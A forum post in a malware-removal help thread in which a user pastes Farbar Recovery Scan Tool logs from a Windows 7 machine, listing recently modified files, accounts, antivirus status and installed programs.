2017-08-10 13:31 - 2009-07-14 11:20 - 000000000 ____D C:\Windows\inf
2017-08-10 12:25 - 2015-06-19 23:21 - 000000000 ____D C:\ProgramData\boost_interprocess
2017-08-10 12:25 - 2014-08-31 13:12 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-10 12:21 - 2009-07-14 12:45 - 000026768 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-08-10 12:21 - 2009-07-14 12:45 - 000026768 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-08-10 12:20 - 2011-04-12 22:46 - 000376078 _____ C:\Windows\system32\prfh0804.dat
2017-08-10 12:20 - 2011-04-12 22:46 - 000119784 _____ C:\Windows\system32\prfc0804.dat
2017-08-10 12:20 - 2009-07-14 13:13 - 001277832 _____ C:\Windows\system32\PerfStringBackup.INI
2017-08-10 12:17 - 2015-08-21 17:53 - 000000000 ____D C:\Program Files (x86)\StrongVPN
2017-08-10 12:14 - 2016-07-12 23:29 - 000000000 ____D C:\Program Files (x86)\Hi-Rez Studios
2017-08-10 12:14 - 2014-09-06 02:14 - 000000548 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2017-08-10 12:14 - 2009-07-14 13:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-08-10 12:13 - 2016-12-22 13:46 - 000004984 _____ C:\ProgramData\NvTelemetryContainer.log_backup1
2017-08-10 12:03 - 2016-12-03 19:05 - 000000000 ____D C:\AdwCleaner
2017-08-10 11:58 - 2014-09-06 10:09 - 000000000 ____D C:\Users\w7\AppData\Roaming\uTorrent
2017-08-10 02:53 - 2016-12-09 00:22 - 000000000 ____D C:\Users\w7\AppData\LocalLow\uTorrent
2017-08-09 15:31 - 2014-08-31 15:41 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-08-09 15:31 - 2014-08-31 15:41 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-08-09 15:31 - 2014-08-31 15:41 - 000004018 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-08-09 15:31 - 2014-08-31 15:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2017-08-09 15:31 - 2014-08-31 15:41 - 000000000 ____D C:\Windows\system32\Macromed
2017-08-09 13:05 - 2016-10-30 16:18 - 000000000 ____D C:\Users\w7\AppData\Local\Microsoft Windows
2017-08-09 04:30 - 2015-01-04 16:12 - 000000000 ____D C:\Users\w7\AppData\Roaming\Youtube Downloader HD
2017-08-08 21:58 - 2014-09-06 02:15 - 000002179 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-08 21:52 - 2014-09-06 02:16 - 000000000 ____D C:\Program Files (x86)\Steam
2017-08-08 21:41 - 2014-09-08 10:20 - 000000000 ____D C:\Users\w7\Documents\My Games
2017-08-08 16:23 - 2014-09-08 10:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics
2017-08-08 16:23 - 2014-08-31 13:15 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-08 15:57 - 2014-09-08 14:43 - 000000948 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-08-08 15:55 - 2014-09-08 14:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-08-08 15:45 - 2016-12-08 20:46 - 000000000 ____D C:\Users\w7\Desktop\2016 dec games
2017-08-08 14:19 - 2016-03-27 12:43 - 000000000 ____D C:\Users\w7\AppData\Local\CrashDumps
2017-08-08 13:11 - 2014-09-09 23:57 - 000000000 ____D C:\Windows\SysWOW64\directx
2017-08-08 07:53 - 2009-07-14 13:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2017-08-07 18:33 - 2015-04-05 17:23 - 000000000 ____D C:\Users\w7\Documents\Nexus Mod Manager
2017-08-07 15:11 - 2014-09-24 13:02 - 000000000 ____D C:\ProgramData\Oracle
2017-08-07 15:10 - 2014-09-24 13:02 - 000270912 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2017-08-07 15:10 - 2014-09-24 13:01 - 000097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2017-08-07 15:10 - 2014-09-24 13:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-08-07 15:09 - 2014-09-24 13:01 - 000000000 ____D C:\Program Files (x86)\Java
2017-08-07 01:07 - 2014-12-13 12:31 - 000000000 ____D C:\Users\w7\AppData\Roaming\Might & Magic Heroes VI
2017-08-07 00:42 - 2016-04-08 09:33 - 000000000 ____D C:\Users\w7\AppData\LocalLow\SogouPY
2017-08-04 02:58 - 2014-09-25 01:25 - 000007596 _____ C:\Users\w7\AppData\Local\resmon.resmoncfg
2017-08-03 15:18 - 2017-06-20 22:04 - 000000000 ____D C:\Users\w7\Desktop\mel concert doc
2017-08-03 15:17 - 2014-10-07 16:22 - 000000000 ____D C:\ProgramData\Malwarebytes
2017-08-03 14:15 - 2014-09-13 17:05 - 000000000 ____D C:\Users\w7\AppData\Local\ESET
2017-08-01 18:21 - 2014-09-08 14:43 - 000000000 ____D C:\Users\w7\AppData\Roaming\Mozilla
2017-08-01 18:21 - 2014-09-08 14:43 - 000000000 ____D C:\Users\w7\AppData\Local\Mozilla
2017-07-31 22:33 - 2017-06-16 20:02 - 000000000 ____D C:\Users\w7\AppData\Local\BjIhIWsdsu
2017-07-31 22:33 - 2017-05-02 17:41 - 000000000 ____D C:\Program Files (x86)\YoutubeAdBlockUn
2017-07-31 22:33 - 2017-05-02 17:41 - 000000000 ____D C:\Program Files (x86)\YoutubeAdBlockIE
2017-07-31 22:33 - 2017-04-25 04:40 - 000000000 ____D C:\ProgramData\locep
2017-07-31 22:31 - 2017-05-02 17:40 - 000000000 ____D C:\Program Files (x86)\ParentalControl
2017-07-29 23:25 - 2017-06-23 11:41 - 000000000 ____D C:\Users\w7\Desktop\photo
2017-07-29 23:24 - 2017-06-20 23:23 - 000000000 ____D C:\Users\w7\Desktop\firestorm kill
2017-07-29 17:44 - 2015-08-08 15:57 - 000003858 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1439020676
2017-07-29 17:44 - 2015-08-08 15:56 - 000000000 ____D C:\Program Files (x86)\Opera
 
==================== Files in the root of some directories =======
 
2017-06-20 16:04 - 2017-06-20 16:04 - 000000034 _____ () C:\Users\w7\AppData\Roaming\AdobeWLCMCache.dat
2016-04-26 02:00 - 2016-04-26 01:41 - 000381678 _____ () C:\Users\w7\AppData\Roaming\favicon.ico
2016-04-26 02:12 - 2016-04-26 02:16 - 000000174 _____ () C:\Users\w7\AppData\Roaming\Friend in War.url
2014-09-29 13:53 - 2015-10-12 21:49 - 000000849 _____ () C:\Users\w7\AppData\Roaming\SkinColor.xml
2015-08-16 11:37 - 2015-08-16 12:59 - 000000009 _____ () C:\Users\w7\AppData\Roaming\update.dat
2014-10-11 13:26 - 2014-10-11 13:26 - 000000008 _____ () C:\Users\w7\AppData\Roaming\_
2015-08-16 11:38 - 2015-08-16 17:06 - 000000004 _____ () C:\Users\w7\AppData\Roaming\Microsoft\notaut.txt
2014-08-31 13:06 - 2014-08-31 13:06 - 000000000 _____ () C:\Users\w7\AppData\Local\Driver_LOM_8161Present.flag
2014-09-25 01:25 - 2017-08-04 02:58 - 000007596 _____ () C:\Users\w7\AppData\Local\resmon.resmoncfg
2016-06-06 04:53 - 2016-06-06 04:53 - 000000000 _____ () C:\Users\w7\AppData\Local\{A1C3DF51-7A7C-440D-B2A0-4C29F88A9C66}
2016-06-06 04:53 - 2016-06-06 04:53 - 000000000 _____ () C:\Users\w7\AppData\Local\{A4ADC871-5904-4807-91AB-FAEDB4D2493C}
2016-07-18 11:26 - 2016-07-18 11:26 - 000000108 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-12-22 13:46 - 2017-08-10 15:44 - 000004165 _____ () C:\ProgramData\NvTelemetryContainer.log
2016-12-22 13:46 - 2017-08-10 12:13 - 000004984 _____ () C:\ProgramData\NvTelemetryContainer.log_backup1
 
Some files in TEMP:
====================
2017-08-10 12:17 - 2017-08-07 19:30 - 000744856 _____ (Strong Technology, LLC) C:\Users\w7\AppData\Local\Temp\StrongHelper.exe
 
Some zero byte size files/folders:
==========================
C:\Windows\System32\Drivers\297854E4.sys
C:\Windows\System32\Drivers\30BE558E.sys
C:\Windows\System32\Drivers\73A4511A.sys
C:\Windows\System32\Drivers\7421544B.sys
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-08-04 18:42
 
==================== End of FRST.txt ============================


#4 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 10 August 2017 - 07:58 AM

Addition log:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 09-08-2017
Ran by w7 (10-08-2017 20:43:23)
Running from C:\Users\w7\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2014-08-31 05:03:08)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1997723473-3802709511-3419621205-500 - Administrator - Disabled)
Guest (S-1-5-21-1997723473-3802709511-3419621205-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1997723473-3802709511-3419621205-1003 - Limited - Enabled)
w7 (S-1-5-21-1997723473-3802709511-3419621205-1000 - Administrator - Enabled) => C:\Users\w7
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: ESET NOD32 Antivirus 7.0 (Enabled - Out of date) {19259FAE-8396-A113-46DB-15B0E7DFA289}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: ESET NOD32 Antivirus 7.0 (Enabled - Out of date) {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
"BioShock Infinite" (HKLM-x32\...\{D081C29C-1DDC-4C55-BCBF-DF8519636331}_is1) (Version: 1.1.25.5165 - )
«Darksiders II»  1.5.up6 (HKLM-x32\...\Darksiders II_is1) (Version: 1.5.up6 - THQ)
«Might and Magic Heroes VI»  1.7.1 (HKLM-x32\...\Might&Magic Heroes VI_is1) (Version: 1.7.1 - Black Hole Entertainment)
µTorrent (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\uTorrent) (Version: 3.4.7.42330 - BitTorrent Inc.)
360云盘 (HKLM-x32\...\360云盘(网盘版)) (Version: 6.5.6.1288 - 360安全中心)
4K Video Downloader 3.8 (HKLM-x32\...\4K Video Downloader_is1) (Version: 3.8.0.1830 - Open Media LLC)
Abyss Odyssey (HKLM-x32\...\Abyss Odyssey_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Adobe Creative Suite 5.5 Master Collection (HKLM-x32\...\{D57FC112-312E-4D70-860F-2DB8FB6858F0}) (Version: 5.5 - Adobe Systems Incorporated)
Adobe Flash Player 26 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 26.0.0.151 - Adobe Systems Incorporated)
Adobe Flash Player 26 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 26.0.0.151 - Adobe Systems Incorporated)
Adobe Illustrator CC 2015 (HKLM-x32\...\{5680D629-B263-49CC-821E-3CEBD4507B51}) (Version: 19.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
Age of Castles (HKLM-x32\...\Age of Castles) (Version:  - )
Age of Mythology: Extended Edition Tale of the Dragon (HKLM\...\YWdlb2ZteXRob2xvZ3lleHRlbmRlZGVkaXRpb24_is1) (Version: 1 - )
AIDA64 Extreme v5.60 (HKLM-x32\...\AIDA64 Extreme_is1) (Version: 5.60 - FinalWire Ltd.)
Alice - Madness Returns (HKLM-x32\...\Alice - Madness Returns_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Alice Madness Returns (HKLM-x32\...\{93A3AB24-36E8-41BA-80C6-CCEC237836DC}) (Version: 1.0.0.0 - Electronic Arts)
Alien - Isolation (HKLM-x32\...\Alien - Isolation_is1) (Version:  - )
Alien Breed 2: Assault (HKLM-x32\...\Steam App 22650) (Version:  - Team17 Software Ltd.)
Alien Swarm: Reactive Drop (HKLM\...\Steam App 563560) (Version:  - Reactive Drop Team)
Aliens: Colonial Marines (HKLM-x32\...\Aliens: Colonial Marines_is1) (Version:  - )
Android USB Driver (HKLM-x32\...\Z5 Android USB Driver_is1) (Version:  - )
Anno 2070 version 2.0 (HKLM-x32\...\{B6249B57-3A35-4E06-A747-F79AE49F275D}_is1) (Version: 2.0 - )
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 376.33 - NVIDIA Corporation) Hidden
Apotheon Arena (HKLM\...\Steam App 417890) (Version:  - Alientrap)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Balabolka (HKLM-x32\...\Balabolka) (Version: 2.11.0.607 - Ilya Morozov)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 1 v.версия 1.0.u3 (HKLM-x32\...\Battlefield 1_is1) (Version:  - )
Battlefield 4 (HKLM-x32\...\Battlefield 4_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.3.32.6227 - BlueStack Systems, Inc.)
Brawlhalla (HKLM\...\Steam App 291550) (Version:  - Blue Mammoth Games)
Broken Age (HKLM-x32\...\Broken Age_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
C&C3 A NEW EXPERIENCE 1.0 (HKLM-x32\...\C&C3 A NEW EXPERIENCE 1.0) (Version: 1.0 - Omega Group Productions)
CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform)
CDisplayEx 1.9.9 (HKLM\...\CDisplayEx_is1) (Version:  - cdisplayex.com)
Child of Light (HKLM-x32\...\Child of Light_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
CloudPirates (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\CloudPirates) (Version: 1.40 - My.com B.V.)
ColorOS USB Drivers 3.2.0 (HKLM\...\{60092746-6A0F-46A9-B9F1-53B62EC0E0A4}_is1) (Version: 3.2.0.17 - )
Command & Conquer Generals (HKLM-x32\...\{06F80017-8F98-4C94-B868-52358569FC32}) (Version: 0.50.0000 - Electronic Arts) Hidden
Command & Conquer Generals (HKLM-x32\...\InstallShield_{06F80017-8F98-4C94-B868-52358569FC32}) (Version: 0.50.0000 - Electronic Arts)
Command & Conquer™ Red Alert™ 3 (HKLM-x32\...\{296D8550-CB06-48E4-9A8B-E5034FB64715}) (Version: 1.0.1.0 - Electronic Arts)
Command & Conquer™ Red Alert™ 3 Uprising (HKLM-x32\...\{DDE59617-F59A-473B-BC4E-C2B81F6CD38D}) (Version: 1.0.1.0 - Electronic Arts)
Command and Conquer 4 - Tiberian Twilight (HKLM-x32\...\Command and Conquer 4 - Tiberian Twilight_is1) (Version:  - )
Command and ConquerTM Generals Zero Hour (HKLM-x32\...\{F3E9C243-122E-4D6B-ACC1-E1FEC02F6CA1}) (Version: 1.00.0000 - Electronic Arts) Hidden
Command and ConquerTM Generals Zero Hour (HKLM-x32\...\InstallShield_{F3E9C243-122E-4D6B-ACC1-E1FEC02F6CA1}) (Version: 1.00.0000 - Electronic Arts)
Counter-Strike: Condition Zero Deleted Scenes (HKLM\...\Steam App 100) (Version:  - Valve)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
CPUID CPU-Z 1.77 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
CPUID HWMonitor 1.28 (HKLM\...\CPUID HWMonitor_is1) (Version:  - )
CUPID - A free to play Visual Novel (HKLM\...\Steam App 421670) (Version:  - Fervent)
Dark Messiah Of Might And Magic (HKLM-x32\...\Dark Messiah Of Might And Magic_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Darkest Dungeon (HKLM-x32\...\Darkest Dungeon_is1) (Version:  - )
Defense Grid 2 (HKLM-x32\...\Defense Grid 2_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Dishonored (HKLM-x32\...\Dishonored_is1) (Version:  - )
Don't Starve - Reign of Giants (HKLM-x32\...\Don't Starve: Reign of Giants_is1) (Version: 2.10.0.20 - GOG.com)
Don't Starve - Shipwrecked (HKLM-x32\...\Don't Starve: Shipwrecked_is1) (Version: 2.0.0.20 - GOG.com)
Don't Starve (HKLM-x32\...\1207659210_is1) (Version: 2.10.0.20 - GOG.com)
Don't Starve Together (HKLM\...\Steam App 322330) (Version:  - Klei Entertainment)
Dota 2 (HKLM\...\Steam App 570) (Version:  - Valve)
Download Accelerator Plus (DAP) (HKLM-x32\...\Download Accelerator Plus (DAP)) (Version: 10059 (Build 2593) - Speedbit Ltd.)
Dragon Age Inquisition Deluxe Edition version 1.11.0.0 (HKLM-x32\...\Dragon Age Inquisition Deluxe Edition_is1) (Version: 1.11.0.0 - Mr DJ)
Dragons and Titans (HKLM\...\Steam App 263500) (Version:  - Wyrmbyte)
Duelyst (HKLM\...\Steam App 291410) (Version:  - Counterplay Games Inc.)
Dying Light The Following Enhanced Edition version 1.10.0.0 (HKLM-x32\...\Dying Light The Following Enhanced Edition_is1) (Version: 1.10.0.0 - Techland)
ËæeÐÐWLAN v2.3.0_0510 (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\ËæeÐÐWLAN v) (Version: 2.3.0 - ÖйúÒƶ¯)
Empire Earth II (HKLM-x32\...\{DF315348-721C-40B8-BAE2-58C6C7D935A2}) (Version:  - )
Empire Earth II Gold Edition (HKLM-x32\...\Empire Earth II Gold Edition_is1) (Version:  - GOG.com)
Escape From Paradise 2 - A Kingdom's Quest 1.00 (HKLM-x32\...\Escape From Paradise 2 - A Kingdom's Quest 1.00) (Version:  - )
ESET NOD32 Antivirus (HKLM\...\{FBC0F617-1AA0-4483-8153-3FD97FE01D9E}) (Version: 7.0.317.4 - ESET, spol s r. o.)
FaceRig version 1.423 (HKLM-x32\...\FaceRig_is1) (Version: 1.423 - )
FaceRig virtual audio driver version 1.0 (HKLM-x32\...\{D605CD1D-D626-4740-B657-86DC30723FCF}_is1) (Version: 1.0 - Adoriasoft LLC)
FaceRig Virtual Video driver version 1.0.1.1000 (HKLM-x32\...\{7D6A1A0F-F57E-4C6B-9331-86CBC7D5C787}_is1) (Version: 1.0.1.1000 - Adoriasoft LLC)
Far Cry Primal (HKLM-x32\...\{80BD47AF-CF13-49B2-99BF-7E78FBA26124}_is1) (Version:  - Ubisoft)
Foxit Reader (HKLM-x32\...\Foxit Reader) (Version:  - )
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Free GIF Viewer (HKLM-x32\...\{C178910D-907A-4FBD-9786-91AFDD85287D}) (Version: 1.0.0 - Media Freeware)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version:  - GOG.com)
Golden Axe (1990) (HKLM-x32\...\Golden Axe (1990)) (Version:  - Friends in War)
Golden Axe (HKLM-x32\...\Golden Axe_is1) (Version:  - GameFabrique)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.90 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Grand Theft Auto V (HKLM-x32\...\Grand Theft Auto V_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, ProZorg_tm)
Grand Theft Auto V (HKLM-x32\...\R3JhbmRUaGVmdEF1dG9W_is1) (Version: 1 - )
Gwent (HKLM-x32\...\1971477531_is1) (Version: 2.0.0.3 - GOG.com)
Halo Wars Definitive Edition (HKLM-x32\...\Halo Wars Definitive Edition_is1) (Version:  - )
HELLDIVERS™ (HKLM\...\Steam App 394510) (Version:  - Arrowhead Game Studios)
Heroes of Might & Magic V (HKLM-x32\...\Steam App 15170) (Version:  - Nival)
Heroes of Might & Magic V: Hammers of Fate (HKLM-x32\...\Steam App 15380) (Version:  - Nival)
Heroes of Might & Magic V: Tribes of the East (HKLM-x32\...\Steam App 15370) (Version:  - Nival)
Heroes of Might and Magic 3 Complete (HKLM-x32\...\Heroes of Might and Magic 3 Complete_is1) (Version:  - GOG.com)
Heroes of Might and Magic 4 Complete (HKLM-x32\...\Heroes of Might and Magic 4 Complete_is1) (Version:  - GOG.com)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HWiNFO64 Version 5.38 (HKLM\...\HWiNFO64_is1) (Version: 5.38 - Martin Mal韐 - REALiX)
ICEY (HKLM\...\Steam App 553640) (Version:  - Shanghai FantaBlade Network Technology Co., Ltd.)
Impossible Creatures (HKLM-x32\...\Impossible Creatures 1.0) (Version:  - )
IMVU Avatar Chat Software (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\IMVU Avatar chat client software BETA) (Version:  - )
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3383 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.1.28 - Intel Corporation)
Intel® Wireless Bluetooth®(patch version 17.1.1512.771) (HKLM\...\{302600C1-6BDF-4FD1-1501-148929CC1385}) (Version: 17.1.1501.0514 - Intel Corporation)
IsoBuster 3.5 (HKLM-x32\...\IsoBuster_is1) (Version: 3.5 - Smart Projects)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
K-Lite Codec Pack 11.4.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.4.0 - )
KLM (HKLM-x32\...\{4DEA5B85-6C56-45F3-AE00-FED756B0D3B4}) (Version: 1.0.1305.3101 - Micro-Star International Co., Ltd.) Hidden
KLM (HKLM-x32\...\InstallShield_{4DEA5B85-6C56-45F3-AE00-FED756B0D3B4}) (Version: 1.0.1305.3101 - Micro-Star International Co., Ltd.)
Layers of Fear (HKLM-x32\...\Layers of Fear_is1) (Version:  - )
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
Life Is Strange (HKLM-x32\...\Life Is Strange_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Logitech Gaming Software 8.88 (HKLM\...\Logitech Gaming Software) (Version: 8.88.30 - Logitech Inc.)
Lost Planet 3 (HKLM-x32\...\Lost Planet 3_is1) (Version:  - Capcom)
MadOut (HKLM-x32\...\Assault Android Cactus_is1) (Version:  - )
Mafia 3 (HKLM-x32\...\Mafia 3_is1) (Version: 1.09.1 - THE KNIGHT)
Mafia II version 1.0 (HKLM-x32\...\{4F5FB47E-14DE-45B4-85E3-11CD5E497KA3}_is1) (Version: 1.0 - 2K Games)
Magic ISO Maker v5.5 (build 0281) (HKLM-x32\...\Magic ISO Maker v5.5 (build 0281)) (Version:  - )
MagicDisc 2.7.106 (HKLM-x32\...\MagicDisc 2.7.106) (Version:  - )
Magicka (HKLM-x32\...\Steam App 42910) (Version:  - Arrowhead Game Studios)
Magicka 2 (HKLM-x32\...\Magicka 2_is1) (Version:  - )
Magicka 2: Ice, Death and Fury (HKLM\...\bWFnaWNrYTJpY2VkZWF0aGFuZGZ1cnk_is1) (Version: 1 - )
Malwarebytes Anti-Malware versione 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Malwarebytes version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes)
Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version:  - Gazillion Entertainment)
Marvel Heroes 2016 (HKLM\...\Steam App 226320) (Version:  - Gazillion Entertainment)
Metal Slug Series with Enabled MAME 0.78 (HKLM-x32\...\Metal Slug Series Enabled MAME 0.78_is1) (Version:  - )
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{86CE1746-9EFF-3C9C-8755-81EA8903AC34}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
